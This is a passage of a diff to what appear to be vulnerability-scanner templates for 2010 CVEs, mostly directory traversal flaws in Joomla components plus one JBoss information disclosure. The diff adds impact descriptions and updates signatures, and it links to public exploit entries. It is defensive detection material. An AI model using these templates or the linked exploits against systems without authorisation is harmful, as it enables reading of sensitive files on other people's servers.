+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/11760
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a460424f7d97033dcbe266eb3791229f7a28b8fc530061e37d85ab04597effb002200a8c83bccd2fed2c3c8bfe321e68864093f992bda6481aa461d52b0a581836f2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206f23347fc78c49c9e4569468806b46c1f3a0a646c189a57c6e021e848668bc52022100d08e6c11bd627fc6eb6668dd39684ae70f76f50186063a230f92a15306a6dafe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml
index c1fcc917f2..811b4cafde 100644
--- a/http/cves/2010/CVE-2010-1081.yaml
+++ b/http/cves/2010/CVE-2010-1081.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
   remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/11511
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100de73743eee8e218a64f00aee1fe51a44879f19bcc8b23166f946f07745624b6d02200c0609ad7c96266004a9dbd6ffe741bfeb5bfd2af21dc17c18c71b2b1deea71d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e30cde27274d020eca121c42cb054cc13396f5f6f7ec473d9e230814405ba65f02207f6f47e4db6c69be8b7442d0214777a30b8b37a8b5f04dd07b5e7e12bd3c3ee5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml
index bab015b3ea..5bbe680253 100644
--- a/http/cves/2010/CVE-2010-1217.yaml
+++ b/http/cves/2010/CVE-2010-1217.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/11814
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100bd055bd6502d4b4a22b3f99f8b75ae7fd4d249a00d2d63062d041dd7dc23747d022100f3d3a5787ce5a40534d37ac4cde47925775cf0f453c8048bad186baee48a0e4d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204b0e6fbebe96039eec5eb535b07e2d769ebf29d714105a0e8516df81a99580eb02200d0bce9a850e85fdf23c0adde163f704107a4b53554740537a0b640c66956d6f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml
index 8f579c6260..d744e23582 100644
--- a/http/cves/2010/CVE-2010-1219.yaml
+++ b/http/cves/2010/CVE-2010-1219.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/11757
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022028b9258dfa53cbf4a25f22b1a2d54ca076fd0af9d1b91249b029d848b42cbc7002202aba1a085f6eeb87eacccc07c59515c2e66ae771bd35fee5cedb8b8aa36620a7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220596ef1369c12f8e3a916e8f9e33299432b1178e9ce95fde59ddc34f77142d2f7022100e9739fb2c8ce4e2826687b0ebd6931d92e35a1568effea53043306c97259db88:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml
index 994ddce73e..07a22db236 100644
--- a/http/cves/2010/CVE-2010-1302.yaml
+++ b/http/cves/2010/CVE-2010-1302.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/11978
@@ -37,4 +39,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220346626db9d1e2e9dc2cb7b66f34fd4785e75af4d9d5f7c6643cb298e1be166ad022100a2d43a822439066dbbd49736f821a4ffa4128015862c28991a7e243f7d511cfd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b57708e6b86599b708a873726d3263ce9e0d49d0e76391bb6e037a1e4937404e02205933cbacd47892558c18c7db7b4e88a0b4baec456d1c7c5491d0e2c9866f4c1c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml
index 12ad4332e0..4b9c11b144 100644
--- a/http/cves/2010/CVE-2010-1305.yaml
+++ b/http/cves/2010/CVE-2010-1305.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12065
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e0a4475a7c35058ce79f49d108bb180242d90cc120c530dd911afd5c66f8a9dc022076d45a27b53fd0cafb5d7adac7596d2f6b6c776544037f7117ba2e8693824aec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e7b04454a6bb69f264e4dd4754eee56b3022c4c5ac84e46575de2bb39dcd4a51022100956719ea0bbde43fd2079b3d401d9f87038ff2daa9c9f264755da2c0fc2a9aae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml
index 92be8dcec6..6fb0d4e198 100644
--- a/http/cves/2010/CVE-2010-1306.yaml
+++ b/http/cves/2010/CVE-2010-1306.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12058
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100db8f60e834d718a187a6affc3ddd8cb07625e1fb067e4d68b5a6f6bab98a0eb3022100b6da76ed5c5b35f5529aa45b95f8de9cc608a6c066dd69264579dc8b909dd0bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e1f4f0060c68c73b81b05fa0c036c433de7e7de661c13e245b6519b209dd0686022100f724f0853fa864ea201f7b3377b3a7ae4bafc82fb0db4544f09b7092d505e11c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml
index 9cf836c028..360c5c2c26 100644
--- a/http/cves/2010/CVE-2010-1307.yaml
+++ b/http/cves/2010/CVE-2010-1307.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12070
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022048439f47a8b21a74b4b97fa613ad972080db3db4fe053230262199d82317045c022100eadd5c390ee4731465f6f514079896cd72f934fd9895315d895f65374aea4e72:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204ea305e21cf6b002e44afd364c3d21030b96316a544c492604ec10f5ff96ecac022100cca452f129982dde163f273a63e54d06d5e6496eef9837cb8c2de19cbe2f74cc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml
index b7bcb60de3..7ab4dfd294 100644
--- a/http/cves/2010/CVE-2010-1308.yaml
+++ b/http/cves/2010/CVE-2010-1308.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12066
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402206a9af6404f873c9d3a57fe9df213511138f01fd29e3ea7105a802d41cf78924102205cb464a7bda81580894d76175190846c791dc1cd402a21817590737b159112e2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022064827a2b3a8d58ef4a2a3c46803548cec0052632c4c7f8d21f18118ebd14b3c6022058eb78319f044f69ba50ef4e0d899e39e70636966010a842185bd8f281387cc8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml
index cd667f1c0d..fb3b2be6e3 100644
--- a/http/cves/2010/CVE-2010-1312.yaml
+++ b/http/cves/2010/CVE-2010-1312.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12077
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f17626c6c2fb265ab27fa0646a728898f1b0c9f3fa847a9fb431a0e39fa82e8b022100f8103d182a1847d338a89d951149a9075835a9588ed011933dfed7688f480995:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100867fd351a2a90244ed77e8046adc2180f92604b75e069d398751668b18310e9802202d41ba7430bbc6e96d855278855e1aefd1286ec09c836f3de9de918bde460e87:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml
index 8e12721736..e298444bc2 100644
--- a/http/cves/2010/CVE-2010-1313.yaml
+++ b/http/cves/2010/CVE-2010-1313.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! CMS.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12082
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100fd165e012bb572dc265b83b5ca8b9c947ddf01bea06fde0c71635d59e7c796e0022013898e8cab7e473e13999ca183c3d97e6bc26290443ddbae95c4946d4faf0ef0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022069608b00d6cce302d41960d97e53dffd2328158a421962cdc5d326a3c65c13d60220253869fcf736190901161cb37df82fd67626fa6b943ac18ade19c1ade10bcba0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml
index 502fc07ce6..6b7a0166ed 100644
--- a/http/cves/2010/CVE-2010-1314.yaml
+++ b/http/cves/2010/CVE-2010-1314.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12086
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c6e61051c3e71766db8c93f1cba690d9e313100d617e7e936a55e737e9bfb3a802206edbc197346bf2a84a7297e202c7b67251c8f0546df7eb690cfaaa5d18b11595:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203ab74f27464637000a111771ceabe7ebf60c232bbce13a6e98a322da6de8bee8022004e7174b83c84a10ed6ef3361845038a32769c167a8c9af5e13cf68801097e59:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml
index 55697e9658..263ae97d41 100644
--- a/http/cves/2010/CVE-2010-1315.yaml
+++ b/http/cves/2010/CVE-2010-1315.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/11999
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100935bdcc2bd3179773fce042c4a61ef810c9d2f814a47b93881e7c146477ff010022100a764011c1841a4d9b132ac59b8dfdb0592de77768416839b1f9c5f345112fb51:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100dc7c7d05af07a16c8189bdfeedfdefc06822cfb29f3b88ef920758007b104b2702200f9367dbbdc9cff4443413464334b1c74617dc88858f43e18aa91c25673c5203:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml
index 2965e9af5e..bc54569366 100644
--- a/http/cves/2010/CVE-2010-1340.yaml
+++ b/http/cves/2010/CVE-2010-1340.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    The vulnerability allows an attacker to include arbitrary local files, leading to remote code execution or sensitive information disclosure.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/33797
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e147f2ff0fcbc48bff40b1ff5321883b2cc1adc91b31edfbb2600c5a8263862402201d97ad50b2b9fde2cff5a0c0239416196581f96dc8d5eff323bec0845867888b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008fe8611cd1efc4f804b1ee87a4214c6c9b21fc126850ea0f1f125c3338f0ed18022100b42e613cc4df538c18194ca7642095e0466c2d796db442442718dadcae08c21c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml
index c290568252..50c58cc2fc 100644
--- a/http/cves/2010/CVE-2010-1345.yaml
+++ b/http/cves/2010/CVE-2010-1345.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/15453
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203bd1daa526a86b54b75dd6e090df43e78b56b22d1ddbff6a1ef56f04466f7e5b0220739e8df81fe0c2e77b397f7d2e0b4e334394ce071ea6a71f9168fea8414a941f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100df0e15dc8ad751dfc509ae1b4143e07b3fb4ed6a605f8ade6971a5802196c61e022100e1d144cc199d7989faa57edff4c8b453911e79d83078f283231bc8863acab853:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml
index 71916abfbd..450a69d822 100644
--- a/http/cves/2010/CVE-2010-1352.yaml
+++ b/http/cves/2010/CVE-2010-1352.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12084
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100cfca9f9c725e410d29e54e6b5d02eedb50e515395715de8019d2c3314e3cf3d302202df3ddf237a67c191f3bde94abc572e0a3ffe5dc0f56dbcf14e0921c3bc8d812:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220499958bd8b65329c91db733607eda67f42e998529c2f50d7bd31533e2f16099f0221009a946f09a949fae53df09425fbda4d4ed20e2bbe6efff9498d618febbfa13ba7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml
index 600685cd42..caaaf7e905 100644
--- a/http/cves/2010/CVE-2010-1353.yaml
+++ b/http/cves/2010/CVE-2010-1353.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: |
     Apply the latest security patches or updates provided by Joomla! to fix the LFI vulnerability in LoginBox component.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221008d048e5078f229b37cb81e90eaf130150a30ba619c876b18220cd4e112a07930022100c9c281d897386357f77dd4b97c302ab1490dc0a2c85ac217b57c888b3a82f978:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a72b93687ae905cb435bd660f819c05235fbbba93843921d66c92829f89326e5022100fa0275f518da4c827f358b9e50a65d64a79c88d9575fb5c2345c113944b2b673:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml
index c347f154c8..9e17bd4159 100644
--- a/http/cves/2010/CVE-2010-1354.yaml
+++ b/http/cves/2010/CVE-2010-1354.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12102
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e7ffeef32693f6aaa1b9e73715026da5c9cc7ae3faeeba9b011d109229d4d711022043a4839f8f123a837925e5cbb0dbcd262d27ed75f3e07bd926872ccf644d6f44:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b5d1dc1258511f9a3bbcbb0f0046814c02884c77cd78b0aeb5347a539fd1704202210092074be1dceaa45c5bec4c8cdebe96901e5956aeff8bb2296f16b5e79131c0a9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml
index 72e511305c..89fc3bed5a 100644
--- a/http/cves/2010/CVE-2010-1429.yaml
+++ b/http/cves/2010/CVE-2010-1429.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Red Hat JBoss Enterprise Application Platform 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 is susceptible to sensitive information disclosure. A remote attacker can obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks.
   remediation: |
     Apply the necessary patches or updates provided by Red Hat to fix the vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100cdc0f292decb28743adf2f23fffa226f0cfd208303a82282a13b1d34c1342f3e02204329a76e1cb2adadd04c7c271fc5fa03ea4030315e839638599a046a5ee65c9b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100eeb17d0a55fe9c292ed360d93e7dc16c7902595cadb704b45bded9319b572a7b022025cecd4333e92104c46103332061db86c2f1fb967473f61b7cd1f0f37afdc41d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml
index be154b3e06..a832f1351d 100644
--- a/http/cves/2010/CVE-2010-1461.yaml
+++ b/http/cves/2010/CVE-2010-1461.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
+  impact: |
+    The LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! application.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12232
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e85030cf632a155f98ccd3f5428e6c94f85503b2707ebe8c899f9efcb0af1ba1022100b682c31513f0e846c2ee8df5221596ebfe97005c4c2e2e939d6e2891ac80b27e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210096d617b9e4bee8999116e4486ab5679a0f8a0e2c3499f80dfbd7e82d29148637022052f87a0ce7cd16e33e9ff539425d1f7229f81901d825193e4586e89a021a2f87:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml
index 15c908a6ce..f9902c7043 100644
--- a/http/cves/2010/CVE-2010-1469.yaml
+++ b/http/cves/2010/CVE-2010-1469.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12146
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220509cc2f4146534580c7a7913594d4ef19b77fd1c74f0e0d29f242ebf6d537c08022100eb4cc1d1d8e3eac73b3a16e6bd7201945be29c95421c8d152f8af462e85066be:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207a230c9a42e5a5c8bb0d395087e0aca9cefd7285a167fa42c9a5a93b14c46d88022100e8550828a91b082e4c908b27285a1ef13d48a2f7580ec020f4ab09aecec205e1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml
index 9cf6cd730b..3dcaccf62e 100644
--- a/http/cves/2010/CVE-2010-1470.yaml
+++ b/http/cves/2010/CVE-2010-1470.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12166
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022033273cdd3751604b219df79fef83b2a2db3cf41a006ebab132c3830ceca3d425022100e304d2b821ca739759d57be72ff0e9c59814d16e0666d337ac2fb4b458c175ec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210090ded558efdc68efdfc4f1021042fe040fd9623e489a797a51ae65dca54add4d022036194cfa1b5329324aac1be6674cbcd60f3f2f02ce8109881a3575f46e7f4929:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml
index 0d10ebec46..9bb821bd3a 100644
--- a/http/cves/2010/CVE-2010-1471.yaml
+++ b/http/cves/2010/CVE-2010-1471.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: |
     Update to the latest version of Joomla! Component Address Book or apply the necessary patches to fix the LFI vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210098fd435fd7ff07962ed5ecb7ad76b65b3dae0a06d576d7845b5495a5b706059e02205eb795796f5fe00743d1e3bc7f48d3c196e1590c792b75dcfdc1b7547e8b2d39:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207abe352a0287053462859d617d5bd1fad54ddcac4ece82145ff93edb42ea650d0220645a86c6f1c30a29acafb429ee6448d393085220af5a5749ff0c71b29114a1d0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml
index 72c2f14382..d62dd254c7 100644
--- a/http/cves/2010/CVE-2010-1472.yaml
+++ b/http/cves/2010/CVE-2010-1472.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potentially execute arbitrary code.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12167
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
